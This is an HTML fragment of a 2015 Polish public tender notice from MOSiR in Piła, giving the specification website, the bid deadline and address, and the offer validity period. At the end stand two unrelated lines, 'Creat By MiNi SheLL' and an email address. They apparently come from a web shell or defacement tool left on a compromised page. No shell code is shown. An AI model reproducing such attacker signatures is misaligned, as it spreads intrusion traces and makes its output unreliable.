<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.mosir.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2015 godzina 10:00, miejsce: siedziba Zamawiającego Sekretariat MOSiR,  ul. Bydgoska 76, 64-920 Piła I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com